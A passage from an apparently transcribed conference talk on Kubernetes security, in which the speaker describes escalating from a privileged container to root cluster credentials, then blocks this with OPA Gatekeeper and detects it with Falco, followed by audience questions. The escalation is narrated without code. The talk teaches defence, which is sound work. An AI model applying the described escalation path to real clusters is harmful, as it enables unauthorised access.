and cat this out here. Poof, root cluster access from cops running in Kubernetes, what I would otherwise not have access to. There's my cert material there on the screen. I would be able to copy this down locally and basically escalate my way to the rest of the cluster and exploit Kubernetes while it's running unsecure.
36:23
So if you're not already preventing this from happening, I'm gonna show you how to do it. So what we wanna do is we're gonna go back to this directory here, and I have some OPA policy that's going to get installed with Gatekeeper that if you wanna go and actually look at what it's doing, it's a lovely set of default policy,
36:40
and we're just gonna k apply minus f gatekeeper.yaml, and what this is gonna do, remember, I'm still this default user, but I was able to escalate my way through to get the root config. What OPA's gonna do now for us is it's gonna prevent this from happening again. Why did this not work?
37:05
Oh yeah, thank you. It doesn't work because RBAC is preventing us from taking action in this. Default, nope, admin to kubeconfig, yes, run this again.
37:25
And so now OPA's gonna prevent us from taking action again, and if I try to run my shell again, you're gonna see here it's effectively denying this request. So what does Falco have to say about all of this? So I have an alias here called falcologs,
37:41
and if I can run that, and basically all it does is it's gonna run klogs minus label app is equal to Falco, in the Falco namespace, minus f, and this is where the whole lesson comes to life, right? This is where we can actually see from the Linux kernel
38:02
what was happening on those systems that are echoing these alerts out to standard out, and we're actually able to create this policy to prevent it from happening again. So the story here, if we look at our alerts that we're getting, it's pretty concerning. First, my container happened to swipe our bash history
38:20
away, and we're starting to get information from Kubernetes and from Docker. We're going through and we're creating new shells. We started a privileged containers. Falco was able to alert that to us as well, and here at the very end, you can see the big exploit itself, privileged containers stacked, and that's where I started to escalate into different parts of the system.
38:42
So the story here, the threat model here, is there are ways of hacking around things if you're not taking preventative action, but in some cases, that might not be enough, and so being able to detect these types of events and these types of anomalies using tools like eBPF allow you to do it in a safe way so that you and your team and your infrastructure can begin to have this sort of checks and balances
39:02
as you go back and forth between security approaches with prevention and security approaches with detection. So if you wanna get involved with any of these projects, they're all CNCF projects. Myself and I'm sure many other maintainers here would love to have you involved, so feel free to reach out to any of us,
39:21
and if anybody has any questions, I think I have about seven or eight minutes left, and while we have the environment on the screen, I'm happy to answer questions or show folks things or anything for that matter. So thank you all for coming. I'm Chris Nova.
39:46
And then one thing, as people start leaving the room, if somebody has a question, I'm gonna save the question back for the recording, so just try to be patient with us as we do the audio relaying here.
40:00
Can I take one or two? Yeah, yeah, go for it. And what is the performance?
40:22
I can't hear you. What is the performance impact of Falco on the? You have to yell at me. What is the performance impact of Falco on systems? Negligible. So the question was, and I'll save this for the recording,
40:41
the question was what's the impact of Falco on the underlying system, and my response was negligible. And the reason for that was because, again, 16 megabytes per core, and it's written C++. So we've got some documents out there on the internet. I'll add one to the markdown document here where we have folks running upwards of 2,000 nodes in Kubernetes,
41:02
all running Falco and still able to maintain their other production loads is fine. In fact, Skyscanner, a company just released a blog that I'll put a link to, they have wonderful metrics where they've been doing load testing and benchmarking with Falco, and you can see the performance of it.
41:20
Yeah, if you have questions, just come right up here, and we'll answer them for the recording. How does this compare to the standard Linux audit framework? How does this compare to the standard Linux audit framework? So it does similar things, but it takes it a step further when you start looking at how we're able to enrich that otherwise only available Linux information
41:43
with Kubernetes, with containers, with other bits of information and data streams coming out of your system. We're right now building a new API for inputs, allowing dynamic inputs being loaded into Falco, so we could potentially start to stream information about IO block devices, XDP,
42:01
the rest of the Linux kernel, and other things happening on your system, and building hybrid objects with all of these input streams that takes it a step further than Linux audit. The question was, do we plan to replace the Linux audit framework
42:20
with Falco? Absolutely not. What we wanna do is we wanna make Falco and the community around Falco mature enough to where we could start to use tools like the Linux audit framework in conjunction with these other tools and assert rules against all of this information coming into Falco. Yeah, what's up?
42:43
Thank you very much, a really nice talk. My question would be, is it possible to turn the shield into a weapon, meaning that somebody using Falco and observing those kernel events and calls discover other vulnerabilities in the system
43:02
by just playing around? So the question here was, would it be possible to discover other vulnerabilities in a system just by playing around with Falco or just seeing what Falco has to say? And I think that was one of the lessons that I was trying to allude to, which is giving an environment where we're taking alerts like this,
43:21
potentially this would be able to be your first glimpse into building the more mature threat model of understanding what actually happened. In my example, I just kind of did it in the reverse way, like I sort of did it backwards where I showed you the threat model and then I showed you what Falco has to say about it. But the idea here is that by detecting anomalies that you are well known in Linux,
43:41
you would potentially be able to start a journey into discovering a CVE, remote command injection, a rootkit, whatever. Yeah, yeah, does anybody want Falco stickers? There's got some more up here. Come here, here. Sorry, there's, I don't know how many are left. There's one, there's some there.
44:01
Have fun. Any other questions? I'm gonna kinda go stand over here if folks wanna come meet me, but I just paused them, so I gotta get out of here and let the next person get ready. Thanks for coming, everyone. Thank you. Thank you. Thank you.